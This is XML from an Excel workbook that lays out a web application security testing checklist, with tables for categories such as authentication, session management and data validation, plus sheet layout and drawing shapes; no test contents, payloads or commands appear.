      <xdr:nvSpPr>
        <xdr:cNvPr id="10" name="Object 14">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000A000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5372100" y="36284535"/>
          <a:ext cx="1076325" cy="509905"/>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266760</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>181080</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1314360</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>695520</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="11" name="Object 1">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000B000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5395595" y="8061325"/>
          <a:ext cx="1047115" cy="514350"/>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1790640</xdr:colOff>
      <xdr:row>80</xdr:row>
      <xdr:rowOff>19080</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2990880</xdr:colOff>
      <xdr:row>80</xdr:row>
      <xdr:rowOff>533520</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="12" name="Object 2">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000C000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6918960" y="67563365"/>
          <a:ext cx="1200785" cy="514350"/>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1143000</xdr:colOff>
      <xdr:row>96</xdr:row>
      <xdr:rowOff>104760</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1600200</xdr:colOff>
      <xdr:row>96</xdr:row>
      <xdr:rowOff>619200</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="13" name="Object 3">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000D000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6271895" y="79461360"/>
          <a:ext cx="457200" cy="514985"/>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1143000</xdr:colOff>
      <xdr:row>102</xdr:row>
      <xdr:rowOff>104760</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1600200</xdr:colOff>
      <xdr:row>102</xdr:row>
      <xdr:rowOff>619200</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="14" name="Object 4">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000E000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6271895" y="83082765"/>
          <a:ext cx="457200" cy="514985"/>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181080</xdr:colOff>
      <xdr:row>171</xdr:row>
      <xdr:rowOff>47520</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1200240</xdr:colOff>
      <xdr:row>171</xdr:row>
      <xdr:rowOff>561960</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="15" name="Object 5">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-00000F000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5309870" y="149529800"/>
          <a:ext cx="1019175" cy="514350"/>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2476440</xdr:colOff>
      <xdr:row>171</xdr:row>
      <xdr:rowOff>38160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>3552840</xdr:colOff>
      <xdr:row>171</xdr:row>
      <xdr:rowOff>552600</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="16" name="Object 6">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000010000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7604760" y="149520910"/>
          <a:ext cx="1076960" cy="514350"/>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590400</xdr:colOff>
      <xdr:row>233</xdr:row>
      <xdr:rowOff>152280</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2133360</xdr:colOff>
      <xdr:row>233</xdr:row>
      <xdr:rowOff>666720</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="17" name="Object 7">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000011000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5718810" y="190454280"/>
          <a:ext cx="1543050" cy="514350"/>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1533600</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>190440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2657520</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>704880</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="18" name="Object 8">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000012000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6662420" y="8070215"/>
          <a:ext cx="1123950" cy="514985"/>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1676520</xdr:colOff>
      <xdr:row>296</xdr:row>
      <xdr:rowOff>95400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2600280</xdr:colOff>
      <xdr:row>296</xdr:row>
      <xdr:rowOff>933480</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="19" name="Object 18">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000013000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6805295" y="247413145"/>
          <a:ext cx="923290" cy="838200"/>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552600</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>276120</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1476360</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>1114200</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="20" name="Object 19">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000014000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5681345" y="18507710"/>
          <a:ext cx="923290" cy="838200"/>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2495520</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>219240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>3419280</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>1057320</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="21" name="Object 20">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000015000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7623810" y="18451195"/>
          <a:ext cx="923925" cy="838200"/>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723960</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>266760</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1638360</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>1104840</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="22" name="Object 21">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000016000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5852795" y="28400375"/>
          <a:ext cx="914400" cy="837565"/>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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>676440</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>237960</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1600200</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>1076040</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="23" name="Object 22">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0500-000017000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="5805170" y="36442015"/>
          <a:ext cx="923925" cy="838200"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="l" t="t" r="r" b="b"/>
          <a:pathLst>
            <a:path w="21600" h="21600">
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="21600" y="0"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="21600" y="21600"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="21600"/>
              </a:lnTo>
              <a:close/>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:solidFill>
          <a:srgbClr val="729FCF"/>
        </a:solidFill>
        <a:ln w="0">
          <a:solidFill>
            <a:srgbClr val="3465A4"/>
          </a:solidFill>
        </a:ln>
      </xdr:spPr>
      <xdr:style>
        <a:lnRef idx="0">
          <a:srgbClr val="FFFFFF"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:srgbClr val="FFFFFF"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:srgbClr val="FFFFFF"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </xdr:style>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F14" totalsRowShown="0">
  <autoFilter ref="A4:F14" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="Information Gathering"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Remar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6:F24" totalsRowShown="0">
  <autoFilter ref="A16:F24" xr:uid="{00000000-0009-0000-0100-000002000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0100-000001000000}" name="Configuration and Deploy Management Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Remar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29" displayName="Table29" ref="A26:F33" totalsRowShown="0">
  <autoFilter ref="A26:F33" xr:uid="{00000000-0009-0000-0100-000003000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="Identity Management Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name="Remark"/>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3" displayName="Table3" ref="A35:F45" totalsRowShown="0">
  <autoFilter ref="A35:F45" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0300-000001000000}" name="Authentication Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0300-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0300-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0300-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0300-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0300-000006000000}" name="Remark"/>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4" displayName="Table4" ref="A53:F61" totalsRowShown="0">
  <autoFilter ref="A53:F61" xr:uid="{00000000-0009-0000-0100-000005000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0400-000001000000}" name="Session Management Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0400-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0400-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0400-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0400-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0400-000006000000}" name="Remark"/>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5" displayName="Table5" ref="A47:F51" totalsRowShown="0">
  <autoFilter ref="A47:F51" xr:uid="{00000000-0009-0000-0100-000006000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0500-000001000000}" name="Authorization Testing "/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0500-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0500-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0500-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0500-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0500-000006000000}" name="Remark"/>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6" displayName="Table6" ref="A101:F110" totalsRowShown="0">
  <autoFilter ref="A101:F110" xr:uid="{00000000-0009-0000-0100-000007000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0600-000001000000}" name="Business logic Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0600-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0600-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0600-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0600-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0600-000006000000}" name="Remark"/>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614" displayName="Table614" ref="A92:F94" totalsRowShown="0">
  <autoFilter ref="A92:F94" xr:uid="{00000000-0009-0000-0100-000008000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0700-000001000000}" name="Error Handling"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0700-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0700-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0700-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0700-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0700-000006000000}" name="Remark"/>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61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0">
  <autoFilter ref="A96:F99" xr:uid="{00000000-0009-0000-0100-000009000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0800-000001000000}" name="Cryptography"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0800-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0800-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0800-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0800-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0800-000006000000}" name="Remark"/>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616" displayName="Table616" ref="A112:F124" totalsRowShown="0">
  <autoFilter ref="A112:F124" xr:uid="{00000000-0009-0000-0100-00000A000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0900-000001000000}" name="Client Side Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0900-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0900-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0900-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0900-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0900-000006000000}" name="Remark"/>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9" displayName="Table9" ref="A63:F90" totalsRowShown="0">
  <autoFilter ref="A63:F90" xr:uid="{00000000-0009-0000-0100-00000B000000}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0A00-000001000000}" name="Data Validation Testing"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0A00-000002000000}" name="Test Name"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0A00-000003000000}" name="Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0A00-000004000000}" name="Tools"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0A00-000005000000}" name="Result"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0A00-000006000000}" name="Remark"/>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e@support.an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26"/>
  <sheetViews>
    <sheetView topLeftCell="A4" zoomScalePageLayoutView="60" workbookViewId="0">
      <selection activeCell="E9" sqref="E9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.6328125" defaultRowHeight="12.5"/>
  <cols>
    <col min="2" max="2" width="38.1796875" customWidth="1"/>
    <col min="3" max="3" width="54.54296875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="2:3" ht="13">
      <c r="B3" s="106" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="106" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="2:3" ht="62.5">
      <c r="B4" s="107" t="s">
        <v>2</v>
      </c>
      <c r="C4" s="107" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="5" spans="2:3" ht="25">
      <c r="B5" s="107" t="s">
        <v>4</v>
      </c>
      <c r="C5" s="107" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="6" spans="2:3">
      <c r="B6" s="107" t="s">
        <v>6</v>
      </c>
      <c r="C6" s="107" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="2:3">
      <c r="B7" s="107" t="s">
        <v>8</v>
      </c>
      <c r="C7" s="107" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="8" spans="2:3">
      <c r="B8" s="107" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="107" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="9" spans="2:3">
      <c r="B9" s="107" t="s">
        <v>12</v>
      </c>
      <c r="C9" s="107" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="62.5">
      <c r="B10" s="107" t="s">
        <v>14</v>
      </c>
      <c r="C10" s="107" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="11" spans="2:3">
      <c r="B11" s="107" t="s">
        <v>16</v>
      </c>
      <c r="C11" s="107" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="25">
      <c r="B12" s="107" t="s">
        <v>17</v>
      </c>
      <c r="C12" s="107" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="13" spans="2:3">
      <c r="B13" s="107" t="s">
        <v>19</v>
      </c>
      <c r="C13" s="107" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="25">
      <c r="B14" s="107" t="s">
        <v>20</v>
      </c>
      <c r="C14" s="107" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="15" spans="2:3">
      <c r="B15" s="107" t="s">
        <v>22</v>
      </c>
      <c r="C15" s="107" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="16" spans="2:3">
      <c r="B16" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C16" s="107" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="17" spans="2:3">
      <c r="B17" s="107" t="s">
        <v>25</v>
      </c>
      <c r="C17" s="107" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="18" spans="2:3">
      <c r="B18" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C18" s="107" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="19" spans="2:3">
      <c r="B19" s="107" t="s">
        <v>29</v>
      </c>
      <c r="C19" s="107" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="20" spans="2:3">
      <c r="B20" s="107" t="s">
        <v>31</v>
      </c>
      <c r="C20" s="107" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="21" spans="2:3">
      <c r="B21" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C21" s="107" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="22" spans="2:3">
      <c r="B22" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C22" s="107" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="23" spans="2:3">
      <c r="B23" s="107" t="s">
        <v>36</v>
      </c>
      <c r="C23" s="107" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="24" spans="2:3">
      <c r="B24" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C24" s="107" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="25" spans="2:3">
      <c r="B25" s="107" t="s">
        <v>38</v>
      </c>
      <c r="C25" s="107" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="26" spans="2:3">
      <c r="B26" s="107" t="s">
        <v>39</v>
      </c>
      <c r="C26" s="107" t="s">
        <v>30</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.3" bottom="0.3" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" useFirstPageNumber="1" horizontalDpi="300" verticalDpi="300"/>
  <headerFooter differentFirs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2"/>
  <sheetViews>
    <sheetView topLeftCell="A45" zoomScalePageLayoutView="60" workbookViewId="0">
      <selection activeCell="A7" sqref="A7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.6328125" defaultRowHeight="12.5"/>
  <cols>
    <col min="1" max="1" width="37.6328125" customWidth="1"/>
    <col min="2" max="2" width="91.36328125" customWidth="1"/>
    <col min="3" max="3" width="20.08984375" customWidth="1"/>
    <col min="4" max="4" width="21.36328125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" ht="13">
      <c r="A1" s="101"/>
      <c r="B1" s="101"/>
      <c r="C1" s="101" t="s">
        <v>40</v>
      </c>
      <c r="D1" s="102"/>
    </row>
    <row r="2" spans="1:4" ht="13">
      <c r="A2" s="103" t="s">
        <v>41</v>
      </c>
      <c r="B2" s="103" t="s">
        <v>42</v>
      </c>
      <c r="C2" s="103" t="s">
        <v>43</v>
      </c>
      <c r="D2" s="103" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="3" spans="1:4" ht="51" customHeight="1">
      <c r="A3" s="108" t="s">
        <v>45</v>
      </c>
      <c r="B3" s="109" t="s">
        <v>46</v>
      </c>
      <c r="C3" s="105" t="s">
        <v>47</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="1:4">
      <c r="A4" s="108"/>
      <c r="B4" s="108"/>
      <c r="C4" s="105" t="s">
        <v>49</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="5" spans="1:4" ht="63.75" customHeight="1">
      <c r="A5" s="108" t="s">
        <v>50</v>
      </c>
      <c r="B5" s="109" t="s">
        <v>51</v>
      </c>
      <c r="C5" s="105" t="s">
        <v>52</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="6" spans="1:4">
      <c r="A6" s="108"/>
      <c r="B6" s="108"/>
      <c r="C6" s="105" t="s">
        <v>53</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="7" spans="1:4" ht="112.5">
      <c r="A7" s="17" t="s">
        <v>54</v>
      </c>
      <c r="B7" s="104" t="s">
        <v>55</v>
      </c>
      <c r="C7" s="105" t="s">
        <v>56</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="8" spans="1:4" ht="62.5">
      <c r="A8" s="17" t="s">
        <v>57</v>
      </c>
      <c r="B8" s="104" t="s">
        <v>58</v>
      </c>
      <c r="C8" s="105" t="s">
        <v>59</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="9" spans="1:4" ht="112.5">
      <c r="A9" s="17" t="s">
        <v>60</v>
      </c>
      <c r="B9" s="104" t="s">
        <v>61</v>
      </c>
      <c r="C9" s="105" t="s">
        <v>62</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="10" spans="1:4" ht="51" customHeight="1">
      <c r="A10" s="108" t="s">
        <v>63</v>
      </c>
      <c r="B10" s="109" t="s">
        <v>64</v>
      </c>
      <c r="C10" s="105" t="s">
        <v>65</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="11" spans="1:4">
      <c r="A11" s="108"/>
      <c r="B11" s="108"/>
      <c r="C11" s="105" t="s">
        <v>66</v>
      </c>
